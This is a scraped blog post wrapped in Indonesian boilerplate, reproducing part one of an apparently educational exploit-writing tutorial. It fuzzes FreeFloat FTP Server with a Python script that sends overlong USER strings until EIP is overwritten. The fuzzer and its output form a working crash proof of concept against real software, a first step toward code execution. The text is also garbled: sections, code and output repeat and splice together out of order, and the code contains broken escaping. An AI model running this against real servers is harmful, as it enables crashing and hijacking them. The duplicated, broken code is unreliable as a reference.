Guide to Basic Exploit Writing (Part 1- Fuzzing)
Guide to Basic Exploit Writing (Part 1- Fuzzing) - Hallo sahabat Fx008z | Official Blogger, Pada Artikel yang anda baca kali ini dengan judul Guide to Basic Exploit Writing (Part 1- Fuzzing), kami telah mempersiapkan artikel ini dengan baik untuk anda baca dan ambil informasi didalamnya. mudah-mudahan isi postingan
Artikel Buffer Overflow,
Artikel Exploit Writing,
Artikel Hacking,
Artikel Linux,
Artikel Tutorial, yang kami tulis ini dapat anda pahami. baiklah, selamat membaca.
Judul : Guide to Basic Exploit Writing (Part 1- Fuzzing)
link : Guide to Basic Exploit Writing (Part 1- Fuzzing)
1. Some knowledge of Python
2. Some familiarity with ollydbg
3. A little knowledge of the FTP protocol
4. A little knowledge of assembly language e.g. what registers EIP, ESP are, commands like JMP ESP
5. Some knowledge of how the stack works
6. A little knowledge of "little-endian"
7. A little knowledge of Hex values e.g. \x41 --> "A"
8. A little knowledge of opcodes e.g. \x90 --> No Operation (NOP)
9. Familiarity with Linux
You also require two machines, or virtual machines. My set-up is as follows:
Attacker (192.168.1.7): Linux with python2.7 installed
Victim (192.168.1.4): Win Vista Business with Ollydbg 1.10 and FreeFloat FTP Server installed.
Note that you can download the FreeFloat program from the exploit-db links above. Both Ollydbg 1.10 and 2.00 can be used. The same exploit writing process can be applied to other Vista and XP versions as well, although you may need to tweak the code a bit.
================================================
3. Creating a Very Basic Fuzzer.
First, run ollydbg on the Victim's computer. Then open the FreeFloat FTP program from within ollydbg. Press F9 to run the FTP program.
Now, let's build a very basic fuzzer to fuzz the program with varying lengths of "AAAAA..." as our Username.
Anda sekarang membaca artikel Guide to Basic Exploit Writing (Part 1- Fuzzing) dengan alamat link https://fx008z.blogspot.com/2012/05/guide-to-basic-exploit-writing-part-1.html
Judul : Guide to Basic Exploit Writing (Part 1- Fuzzing)
link : Guide to Basic Exploit Writing (Part 1- Fuzzing)
Guide to Basic Exploit Writing (Part 1- Fuzzing)
Hello GreenHackerz Readers............
This is the continuation of last article "Buffer Overflow Exploitation". Here, we all focusing on the practical area of the exploitation.
So, Lets Start.
0X01 - What is Fuzzing?
Fuzz testing or fuzzing is a software testing technique used to discover coding errors and security loopholes in software, operating systems or networks by inputting massive amounts of random data, called fuzz, to the system in an attempt to make it crash. If a vulnerability is found, a tool called a fuzz tester (or fuzzer), indicates potential causes. Fuzz testing was originally developed by Barton Miller at the University of Wisconsin in 1989.
Fuzzers work best for problems that can cause a program to crash, such as buffer overflow, cross-site scripting, denial of service attacks, format bugs and SQL injection. These schemes are often used by malicious hackers intent on wreaking the greatest possible amount of havoc in the least possible time. Fuzz testing is less effective for dealing with security threats that do not cause program crashes, such as spyware, some viruses, worms, Trojans and keyloggers.
Fuzz testing is simple and offers a high benefit-to-cost ratio. Fuzz testing can often reveal defects that are overlooked when software is written and debugged. Nevertheless, fuzz testing usually finds only the most serious faults. Fuzz testing alone cannot provide a complete picture of the overall security, quality or effectiveness of a program in a particular situation or application. Fuzzers are most effective when used in conjunction with extensive black box testing, beta testing and other proven debugging methods.
================================================
1. Introduction.
A FreeFloat FTP Server Buffer Overflow Vulnerability for the Metasploit Framework was released on 07/07/2011 on the Exploit Database (www.exploit-db.com/exploits/17498). The description noted that the exploit works on Win XP SP3 Eng. It was tried on XP SP3 setup but it didn't work, then it was decided that might be "re-discover" the exploit. Since the exploit for XP SP3 has already been done (despite it not working ). The same approach has been taken for XP SP2, SP3, etc. Unfortunately, for Win 7, it worked (the fuzzing part and the loading of the shell code), I believe the DEP prevents the exploit from executing.
Anyway, I will probably divide this walkthrough into 3 parts. This first part will focus on fuzzing. The second part will probably focus on controlling the EIP and the last on the loading of the shellcode and executing of the exploit. A few points to note:
1. I will try to keep this walkthrough as simple and as "fundamental" as possible, hopefully to help rookies (like me!) get their feet wet in writing exploits. If you prefer more details, there are several good tutorials out there on the web.
2. I will try to avoid the use of Metasploit, specifically the use of msfconsole. That said, I will still use pattern_create, pattern_offset, msfpayload and msfencode, so that we can focus more on the exploit process and less on assembly language, the compiler, the linker, etc.
3. This tutorial is meant for educational purposes only. Test the exploit only on computer networks you own.
================================================
2. Pre-requisite Knowledge.
Here are some pre-requisite knowledge.
1. Some knowledge of Python
2. Some familiarity with ollydbg
3. A little knowledge of the FTP protocol
4. A little knowledge of assembly language e.g. what registers EIP, ESP are, commands like JMP ESP
5. Some knowledge of how the stack works
6. A little knowledge of "little-endian"
7. A little knowledge of Hex values e.g. \x41 --> "A"
8. A little knowledge of opcodes e.g. \x90 --> No Operation (NOP)
9. Familiarity with Linux
You also require two machines, or virtual machines. My set-up is as follows:
Attacker (192.168.1.7): Linux with python2.7 installed
Victim (192.168.1.4): Win Vista Business with Ollydbg 1.10 and FreeFloat FTP Server installed.
Note that you can download the FreeFloat program from the exploit-db links above. Both Ollydbg 1.10 and 2.00 can be used. The same exploit writing process can be applied to other Vista and XP versions as well, although you may need to tweak the code a bit.
================================================
3. Creating a Very Basic Fuzzer.
First, run ollydbg on the Victim's computer. Then open the FreeFloat FTP program from within ollydbg. Press F9 to run the FTP program.
Now, let's build a very basic fuzzer to fuzz the program with varying lengths of "AAAAA..." as our Username.
Code
#!/usr/bin/python2.7
# fuzzer.py - An extremely simple fuzzer
import sys
import socket
import time
target_addr = sys.argv[1]
target_port = int(sys.argv[2])
lengths = {127,128,129,255,256,257,511,512,513,1023,1024,1025,2047,2048,2049,4095,4096,4097}
#!/usr/bin/python2.7
# fuzzer.py - An extremely simple fuzzer
import sys
import socket
import time
target_addr = sys.argv[1]
target_port = int(sys.argv[2])
lengths = {127,128,129,255,256,257,511,512,513,1023,1024,1025,2047,2048,2049,4095,4096,4097}
for length in lengths: #I am having problems with indentation for the
submission. The whole block of code below
should be indented.
fuzz = \"\x41\" * length #set fuzz to a different length of 'A's each loop
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #create a TCP socket
connect = sock.connect((target_addr, target_port))
sock.recv(1024) #receive the Welcome text from the FTP server
print \"Sending\", length, \"'A's\"
sock.send(\"USER \" + fuzz + \"\r\n\") #send USER AAAAA...
sock.close()
print length, \"'A's sent\n\"
time.sleep(0.5)
===============================================
4. Running the Fuzzer.
Now, make your fuzzer.py file executable, and run it. You should get something similar to the following:
# ./fuzzer.py 192.168.1.4 21
Sending 4096 'A's
4096 'A's sent
Sending 4097 'A's
4097 'A's sent
Sending 1025 'A's
1025 'A's sent
Sending 2048 'A's
2048 'A's sent
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #create a TCP socket
connect = sock.connect((target_addr, target_port))
sock.recv(1024) #receive the Welcome text from the FTP server
print \"Sending\", length, \"'A's\"
sock.send(\"USER \" + fuzz + \"\r\n\") #send USER AAAAA...
sock.close()
print length, \"'A's sent\n\"
time.sleep(0.5)
===============================================
4. Running the Fuzzer.
Now, make your fuzzer.py file executable, and run it. You should get something similar to the following:
# ./fuzzer.py 192.168.1.4 21
Sending 4096 'A's
4096 'A's sent
Sending 4097 'A's
4097 'A's sent
Sending 1025 'A's
1025 'A's sent
Sending 2048 'A's
2048 'A's sent
Sending 2049 'A's
2049 'A's sent
2049 'A's sent
Sending 129 'A's
129 'A's sent
129 'A's sent
Sending 128 'A's
128 'A's sent
Sending 127 'A's
127 'A's sent
128 'A's sent
Sending 127 'A's
127 'A's sent
Sending 257 'A's
257 'A's sent
The program 'hangs' after sending out 257 'A's. It may differ slightly for you, but the figure should be between 200+ to ~1000. More importantly, take a look at the top right window of ollydbg, which shows the registers. Look at the value of EIP, which holds the address of the instruction to be executed - it is 41414141 or AAAA! 4 bytes from our string of 'A's has overwritten the EIP and there's a chance we can control the execution of the FTP program.
Before moving on to the next part on Controlling the EIP, try to tweak the lengths in fuzzer.py to find out approximate maximum length of 'A's that will 'hang' the FTP program and overwrite the EIP with 41414141. For Vista, it should be around 1000. You will probably need to restart the FTP program in ollydbg. Do so by keying in Crtl-F2, followed by F9.
257 'A's sent
The program 'hangs' after sending out 257 'A's. It may differ slightly for you, but the figure should be between 200+ to ~1000. More importantly, take a look at the top right window of ollydbg, which shows the registers. Look at the value of EIP, which holds the address of the instruction to be executed - it is 41414141 or AAAA! 4 bytes from our string of 'A's has overwritten the EIP and there's a chance we can control the execution of the FTP program.
Before moving on to the next part on Controlling the EIP, try to tweak the lengths in fuzzer.py to find out approximate maximum length of 'A's that will 'hang' the FTP program and overwrite the EIP with 41414141. For Vista, it should be around 1000. You will probably need to restart the FTP program in ollydbg. Do so by keying in Crtl-F2, followed by F9.
I will stop here for now. Part 2 on Controlling the EIP will hopefully be up by next article.
I hope you understand something from the article and helps you to proceed more in exploits. We will learn a lot more when we progress in the same. But it is essential to have a firm understanding in basic concepts.
I hope you understand something from the article and helps you to proceed more in exploits. We will learn a lot more when we progress in the same. But it is essential to have a firm understanding in basic concepts.
espérons qu'il vous plaira.
Enjoy the article.
Demikianlah Artikel Guide to Basic Exploit Writing (Part 1- Fuzzing)
Sekianlah artikel Guide to Basic Exploit Writing (Part 1- Fuzzing) kali ini, mudah-mudahan bisa memberi manfaat untuk anda semua. baiklah, sampai jumpa di postingan artikel lainnya.
Anda sekarang membaca artikel Guide to Basic Exploit Writing (Part 1- Fuzzing) dengan alamat link https://fx008z.blogspot.com/2012/05/guide-to-basic-exploit-writing-part-1.html
Tidak ada komentar :
Posting Komentar